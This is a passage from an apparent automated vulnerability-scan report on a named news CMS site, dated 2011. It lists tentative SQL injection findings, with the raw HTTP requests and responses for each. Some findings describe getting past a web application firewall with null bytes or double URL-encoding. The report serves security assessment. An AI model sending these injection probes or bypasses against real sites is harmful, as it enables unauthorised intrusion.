X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.5299
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp7
Content-Length: 40844


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.54. http://www.townnews365.com/site/affiliates/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/affiliates/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /site/affiliates/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site/affiliates/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:19 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.55. http://www.townnews365.com/site/affiliates/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/affiliates/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /site/affiliates/?1%00'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site/affiliates/?1%00''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:10 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.56. http://www.townnews365.com/site/customers [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/customers

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /site'/customers HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site''/customers HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:42:11 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.57. http://www.townnews365.com/site/customers/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/customers/editorial/editorial-core-base/resources/images/user_70.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /site/customers'/editorial/editorial-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site/customers''/editorial/editorial-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:53 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.58. http://www.townnews365.com/site/customers/global/resources/styles/print.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/customers/global/resources/styles/print.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /site/customers/global/resources'/styles/print.css HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site/customers/global/resources''/styles/print.css HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:48 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.59. http://www.townnews365.com/tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:18 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.60. http://www.townnews365.com/tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tncms/ads/[random_number]/center-top1/2%2527/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/center-top1/2%2527%2527/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:49 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.61. http://www.townnews365.com/tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/center-top1/2/8d%00'/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/center-top1/2/8d%00''/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:54 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.62. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:17 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.63. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:52 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.64. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif?1%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif?1%2527%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:56 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.65. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:10 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.66. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/8'/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/8''/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:08 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.67. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:43 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.68. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1%00'/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1%00''/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:34 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.69. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:10 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.70. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:26 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.71. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg?1%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
